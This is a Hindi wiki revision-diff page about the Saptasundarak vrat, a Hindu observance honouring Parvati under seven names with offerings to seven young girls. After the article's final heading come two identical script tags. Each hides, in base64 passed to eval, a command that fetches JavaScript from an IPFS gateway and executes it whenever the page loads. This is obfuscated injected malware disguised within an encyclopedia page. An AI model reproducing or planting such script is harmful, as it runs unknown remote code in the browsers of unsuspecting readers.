Difference between revisions of "सप्तसुन्दरक व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " {{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "")
m (Text replace - ")</ref" to "</ref")
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*सप्तसुन्दरक व्रत में [[पार्वती]] की, उसके सात नामों, यथा–[[कुमुदा]], [[माधवी]], [[गौरी]], [[भवानी]], पार्वती, [[उमा]], एवं [[अम्बिका]] के साथ पूजा करनी चाहिए।
 
*सप्तसुन्दरक व्रत में [[पार्वती]] की, उसके सात नामों, यथा–[[कुमुदा]], [[माधवी]], [[गौरी]], [[भवानी]], पार्वती, [[उमा]], एवं [[अम्बिका]] के साथ पूजा करनी चाहिए।
 
*सात दिनों तक सात कुमारियों लगभग 8 वर्षीय को भोजन देना को कराना चाहिए।
 
*सात दिनों तक सात कुमारियों लगभग 8 वर्षीय को भोजन देना को कराना चाहिए।
Line 5: Line 5:
 
*सातवें दिन सातों का आहावान तथा [[गंध]], [[पुष्प]] आदि तथा [[पान]], [[सिन्दूर]], [[नारियल]] आदि से सम्मान करना चाहिए।
 
*सातवें दिन सातों का आहावान तथा [[गंध]], [[पुष्प]] आदि तथा [[पान]], [[सिन्दूर]], [[नारियल]] आदि से सम्मान करना चाहिए।
 
*पूजा के उपरान्त प्रत्येक के सामने दर्पण रखना चाइए।
 
*पूजा के उपरान्त प्रत्येक के सामने दर्पण रखना चाइए।
*इससे सौन्दर्य एवं सौभाग्य की प्राप्ति तथा पाप मुक्ति होती है।<ref>हेमाद्रि (व्रत खण्ड 2, 886-887, भविष्योत्तरपुराण से उद्धरण)</ref>
+
*इससे सौन्दर्य एवं सौभाग्य की प्राप्ति तथा पाप मुक्ति होती है।<ref>हेमाद्रि (व्रत खण्ड 2, 886-887, भविष्योत्तरपुराण से उद्धरण</ref>
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:46, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • saptasundarak vrat mean parvati ki, usake sat namoan, yatha–kumuda, madhavi, gauri, bhavani, parvati, uma, evan ambika ke sath pooja karani chahie.
  • sat dinoan tak sat kumariyoan lagabhag 8 varshiy ko bhojan dena ko karana chahie.
  • 6 dinoan tak uparyukt sat namoan mean kisi ek ka prayog tatha 'kumuda prasann hoan' aisa kahana chahie.
  • satavean din satoan ka ahavan tatha gandh, pushp adi tatha pan, sindoor, nariyal adi se samman karana chahie.
  • pooja ke uparant pratyek ke samane darpan rakhana chaie.
  • isase saundary evan saubhagy ki prapti tatha pap mukti hoti hai.[1]

tika tippani aur sandarbh

  1. hemadri (vrat khand 2, 886-887, bhavishyottarapuran se uddharan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>